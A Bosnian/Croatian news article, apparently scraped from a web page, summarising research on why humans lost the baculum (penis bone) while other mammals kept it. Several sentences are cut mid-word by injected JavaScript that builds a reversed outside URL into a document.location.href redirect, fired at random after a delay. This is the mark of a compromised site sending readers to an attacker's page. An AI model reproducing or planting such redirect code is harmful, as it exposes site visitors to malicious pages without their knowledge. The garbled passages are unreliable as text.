Kod nekih naraste i do 60 cm! Naučnici vjeruju da su riješili najveću misteriju muškog polnog organa

Imaju je mnoge vrste sisavaca – kod majmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}una može biti dužine prsta, dok kod morža naraste i do 60 cm. No, mužjaci ljudskog roda su bez nje. Poznata znanstvenicima pod nazivom baculum, kost u penisu je svojevrsno čudo evolucije, piše britanski Guardian.

Neki sisavci je imaju, neki nemaju, a veličina varira od dužine nokta pa preko pola metra, zbog čega se često opisuje kao najrazličitija kost koja je ikad postojala. Zbog toga su znanstvenici odlučili istražiti njezin evolucijski razvoj, od prvih pojava pa do odgovora na pitanje kad su je muškarci izgubili.

Istraživanje su proveli Kit Opie i Matilda Brindle s University College London, a otkrili su da se ova kost kod sisavaca razvila još prije 95 milijtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}una godina, a kod primata se pojavila prije 50-ak milijtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}una godina. Od tog momenta počela se primjećivati i razlika u veličini te kosti kod različitih životinja, a Opie smatra da je odlučujući faktor za to bila dužina seksualnog odnosa. Mužjaci vrsta kod kojih je penetracija u pravilu trajala duže od tri minute (što je bio strateški faktor kojim se osiguravala oplodnja ženke te istovremeno onemogućavalo konkurenciju da se okuša) razvili su dužu kost, koja se zbog “strukturne potpore” nalazila u vrhu penisa, a ne u “bazi”.

Znanstvenici smatraju da su ljudi ovu kost izgubili u vremenu kad je monogamija postala dominantna reproduktivna strategija, u vrijeme našeg pretka Homo erectusa prije nekih 1.9 milijtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}una godina. U monogamnim odnosima mužjaci ne trebaju provesti toliko vremena penetrirajući ženku jer su manje šanse, u teoriji, da će je zaskočiti drugi pohotni mužjaci.

– Sa smanjenom konkurencijom među mužjacima, manja je potreba za baculumom. Bez obzira na ono što želimo misliti, mi smo zapravo jedna od vrsta koja spada među one kod kojih penetracija traje manje od tri minute u prosjeku – rekao je Opie čije je istraživanje objavljeno u Proceedings of the Royal Society.

Buka

Pogrebni prevoz Iris Lim Profi Prijedor Panta rhei Prijedor

You must be logged in to post a comment Login